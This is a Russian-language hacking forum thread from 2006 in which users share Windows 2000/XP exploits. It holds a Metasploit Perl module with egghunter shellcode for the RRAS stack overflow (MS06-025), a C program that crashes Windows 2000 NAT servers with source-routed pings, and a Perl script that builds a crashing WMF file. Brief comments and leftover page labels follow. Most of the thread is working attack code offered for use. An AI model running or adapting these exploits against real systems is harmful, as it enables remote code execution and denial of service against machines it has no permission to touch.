  qq{
      This module exploits a registry-based stack overflow in the Windows Routing 
  	and Remote Access Service. Since the service is hosted inside svchost.exe, 
  	a failed exploit attempt can cause other system services to fail as well. 
  	A valid username and password is required to exploit this flaw on Windows 2000. 
  	When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
  	Exploiting this flaw involves two distinct steps - creating the registry key
  	and then triggering an overwrite based on a read of this key. Once the key is
  	created, it cannot be recreated. This means that for any given system, you
  	only get one chance to exploit this flaw. Picking the wrong target will require
  	a manual removal of the following registry key before you can try again:
  	HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook
}
   ),

	'Refs' =>
   [
  [ 'BID', '18325' ],
  [ 'CVE', '2006-2370' ],
  [ 'OSVDB', '26437' ],
  [ 'MSB', 'MS06-025' ]
   ],

	'DefaultTarget' => 0,
	'Targets'       =>
   [
  [ 'Automatic' ],
  [ 'Windows 2000',   0x750217ae ], # call esi
   ],

	'Keys' => ['rras'],

	'DisclosureDate' => 'Jun 13 2006',
  };

sub new {
	my ($class) = @_;
	my $self    = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
	return ($self);
}

sub Exploit {
	my ($self)      = @_;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target      = $self->Targets->[$target_idx];

	my $FragSize = $self->GetVar('FragSize') || 256;
	my $target   = $self->Targets->[$target_idx];

	my ( $res, $rpc );

	my $pipe    = "\\" . $self->GetVar("SMBPIPE");
	my $uuid    = '20610036-fa22-11cf-9823-00a0c911e5df';
	my $version = '1.0';

	my $handle =
   Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host,
  $pipe );

	my $dce = Pex::DCERPC->new(
  'handle'      => $handle,
  'username'    => $self->GetVar('SMBUSER'),
  'password'    => $self->GetVar('SMBPASS'),
  'domain'      => $self->GetVar('SMBDOM'),
  'fragsize'    => $self->GetVar('FragSize'),
  'bindevasion' => $self->GetVar('BindEvasion'),
  'directsmb'   => $self->GetVar('DirectSMB'),
   );

	if ( !$dce ) {
  $self->PrintLine("[*] Could not bind to $handle");
  return;
	}

	my $smb = $dce->{'_handles'}{$handle}{'connection'};
	if ( $target->[0] =~ /Auto/ ) {
  if ( $smb->PeerNativeOS eq 'Windows 5.0' ) {
  	$target = $self->Targets->[1];
  	$self->PrintLine('[*] Detected a Windows 2000 target...');
  }
  #elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) {
  #	$target = $self->Targets->[2];
  #	$self->PrintLine('[*] Detected a Windows XP target...');
  #}
  else {
  	$self->PrintLine( '[*] No target available : ' . $smb->PeerNativeOS() );
  	return;
  }
	}

	# Shiny new egghunt from the 3.0 code :-)
	my $egghunt =
   "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02" .
   "\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" .
   "\x41\x41\x41\x41".
   "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";

	# Pick a "filler" character that we know doesn't get mangled
	# by the wide string conversion routines
	my $fillset = "\xc1\xff\x67\x1b\xd3\xa3\xe7";
	my $filler  = substr($fillset, rand(length($fillset)), 1);
	my $eggtag  = '';
	my $pattern = '';

	while (length($eggtag) < 4) {
  $eggtag .= substr($fillset, rand(length($fillset)), 1);
	}

	# Configure the egg
	substr($egghunt, 0x12, 4, $eggtag);

	# We use an egghunter to give us nearly unlimited room for shellcode
	my $eggdata =
   ($filler x 1024).
   $eggtag.
   $eggtag.
   $shellcode.
   ($filler x 1024);

	# Mini-payload that launches the egghunt
	my $bof = $filler x 178;
	substr($bof, 84, length($egghunt), $egghunt);

	# Base pointer override occurs with this string
	my $pat =
   ($filler x 886).
   pack('V', $target->[1]).
   ($filler x 3). "\xc0".
   $bof;

	# The vulnerability is triggered with the second field of this structure
	my $type2 =
   Pex::NDR::UnicodeConformantVaryingStringPreBuilt( ($filler x 1024) . "\x00" ).
   Pex::NDR::UnicodeConformantVaryingStringPreBuilt( $pat . "\x00" ).
   Pex::NDR::UnicodeConformantVaryingStringPreBuilt( ($filler x 4096) . "\x00" ).
   Pex::NDR::Long( int(rand(0xffffffff)) ).
   Pex::NDR::Long( int(rand(0xffffffff)) );

	# Another gigantic structure, many of these fields up as registry values
	my $type1 =
   Pex::NDR::Long(int(rand(0xffffffff))) . # OperatorDial
   Pex::NDR::Long(int(rand(0xffffffff))) . # PreviewPhoneNumber
   Pex::NDR::Long(int(rand(0xffffffff))) . # UseLocation
   Pex::NDR::Long(int(rand(0xffffffff))) . # ShowLights
   Pex::NDR::Long(int(rand(0xffffffff))) . # ShowConnectStatus
   Pex::NDR::Long(int(rand(0xffffffff))) . # CloseOnDial
   Pex::NDR::Long(int(rand(0xffffffff))) . # AllowLogonPhonebookEdits
   Pex::NDR::Long(int(rand(0xffffffff))) . # AllowLogonLocationEdits
   Pex::NDR::Long(int(rand(0xffffffff))) . # SkipConnectComplete
   Pex::NDR::Long(int(rand(0xffffffff))) . # NewEntryWizard
   Pex::NDR::Long(int(rand(0xffffffff))) . # RedialAttempts
   Pex::NDR::Long(int(rand(0xffffffff))) . # RedialSeconds
   Pex::NDR::Long(int(rand(0xffffffff))) . # IdleHangUpSeconds
   Pex::NDR::Long(int(rand(0xffffffff))) . # RedialOnLinkFailure
   Pex::NDR::Long(int(rand(0xffffffff))) . # PopupOnTopWhenRedialing
   Pex::NDR::Long(int(rand(0xffffffff))) . # ExpandAutoDialQuery
   Pex::NDR::Long(int(rand(0xffffffff))) . # CallbackMode
   Pex::NDR::Long(0x45).
   $type2.
   Pex::NDR::UnicodeConformantVaryingString("\x00" x 129).
   Pex::NDR::Long(int(rand(0xffffffff))).
   Pex::NDR::UnicodeConformantVaryingString("\x00" x 520).
   Pex::NDR::UnicodeConformantVaryingString("\x00" x 520).
   Pex::NDR::Long(int(rand(0xffffffff))).
   Pex::NDR::Long(int(rand(0xffffffff))).
   Pex::NDR::Long(int(rand(0xffffffff))).
   Pex::NDR::Long(int(rand(0xffffffff))).
   Pex::NDR::Long(int(rand(0xffffffff))).
   Pex::NDR::Long(int(rand(0xffffffff))).
   Pex::NDR::Long(int(rand(0xffffffff))).
   Pex::NDR::Long(int(rand(0xffffffff))).
   Pex::NDR::UnicodeConformantVaryingString("\x00" x 514).
   Pex::NDR::Long(int(rand(0xffffffff))).
   Pex::NDR::Long(int(rand(0xffffffff)));

	# Create the actual RPC stub and tack our payload on the end
	my $stub =
   $type1.
   Pex::NDR::Long(int(rand(0xffffffff))).
   $eggdata;

	$self->PrintLine("[*] Creating the malicious registry key...");
	my @response = $dce->request( $handle, 0x0A, $stub );

	$self->PrintLine("[*] Triggering the base pointer overwrite...");
	my @response = $dce->request( $handle, 0x0A, $stub );

	if (@response) {
  $self->PrintLine('[*] RPC server responded with:');
  foreach my $line (@response) {
  	$self->PrintLine( '[*] ' . $line );
  }
  $self->PrintLine('[*] This probably means that the system is patched');
	}
	return;
}

1;

Слив:

Скачать|Download

Ŧ1LAN · 30.06.2006

и ещё один.
MS Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit
Эксплоит:

Код:

/*

####################################
# 
# Windows TCP/IP source routing poc
# C version...
#
# by Preddy
#
# RootShell Security Group
#
# Shoutz 2: 
#
#  Jimmy and ByteCoder + 
#  Rs Crew + 
#  Rest of the world :D
#
#
####################################

Compile:

gcc win-tcpip-dos.c -o wintcpipdos

Info:

Published:     
14.06.2006
Source:        ANDREYMINAEV
Type:          remote
Level:         9/10

Buffer overflow on ICMP packets with Loose Source and Record Route IP options. 
Short message translation: There are DoS conditions in Windows 2000 built-in NAT 
server. Tested configuration: Windows 2000 English Standard/Advanced Service Pack 4 
+ Update Rollup 1 for Service Pack 4 with NAT server enabled. While routing packets 
with options "Loose Source and Record Route"defined by RFC 791 through server, Windows 
crashes to BSOD with error in tcpip.sys or ntoskrnl.exe, or system hangs or system 
began instable work. It doesn't metter if packets are from internal or external 
networks. Use attached script to test vulnerability. On Windows 2003 problem 
doesn't present. It's also likely same problem to present in Windows 2000 + 
ISA 2000. Code execution is potentially possible.

*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

main(int argc, char *argv[])
{

char dos_ip[255];
char mysystem[10];
char ping[20+1];
char trace[100];

if(argc != 3)
{

printf("\n\nWindows TCP/IP source routing Dos - by Preddy\n");
printf("Usage: %s <ip> <mysystem>\n", argv[0]);
printf("Example: %s 127.0.0.1 linux\n", argv[0]);
printf("Uses the ping and the traceroute utility on your system\n", argv[0]);
printf("Should cause a BSOD on the remote system\n");
printf("More info: http://www.security.nnov.ru/Fnews753.html\n\n");
exit(1);
}

strcpy(dos_ip, argv[1]);
strcpy(mysystem, argv[2]);

if((strcmp (argv[2],"linux"))==0)
{

printf("\nTarget: %s\n", dos_ip);
printf("MySystem: %s\n", mysystem);
printf("Sending Payload...\n\n");

strcpy(ping, "ping -c 1 ");
strncat(ping,argv[1],9);
strcpy(trace, "traceroute -m 1 -g 0.0.0.0 ");
strncat(trace,argv[1],9);


while(1)
{

system(trace);
system(ping);
}

}

if((strcmp (argv[2],"windows"))== 0)
{

printf("Target: %s\n", dos_ip);
printf("MySystem: %s\n", mysystem);
printf("Sending Payload...\n");

strcpy(ping, "ping -n 1 ");
strncat(ping,argv[1],9);

strcpy(trace, "tracert -h 1 -j 0.0.0.0 ");
strncat(trace,argv[1],9);

while(1)
{
system(trace);
system(ping);
}

}

}

Roach · 30.06.2006

в следующий раз выкладывайте пожалуйста в виде *.txt фала, для скачивания или перенаправления на другую страницу, а то эту долго листать. :huh:
[mod][Ŧ1LAN:] ок, если большие будут.[/mod]

not null · 07.08.2006

MS Windows WMF-bug denial of service exploit

Код:

#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by cyanid-E <biz4rre\@gmail.com>";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";

Как говорится, старая сказка на новый лад...
Сей пеловый скрипт генерирует wmf-файл. Стандартный виндовый просмотрщик изображений вылетает нафиг

nerezus · 07.08.2006

то злонамеренному пользователю(aka Хацкер) удасться подменить logon.scr на левый файл

не хватит прав.

ammok · 08.08.2006

nerezus
Хватит если aka Хацкер будет с админскими правами

, вообще бредовая бага...

Microsoft Windows 2k, XP exploits

CPU register

CPU register

Старожил форума

Вложения

Старожил форума

Старожил форума

CPU register

CPU register

Вложения

CPU register

CPU register

(L1) cache

(L3) cache

(L3) cache

CPU register

(L2) cache

(L2) cache

CPU register

(L2) cache

(L2) cache

(L1) cache

(L1) cache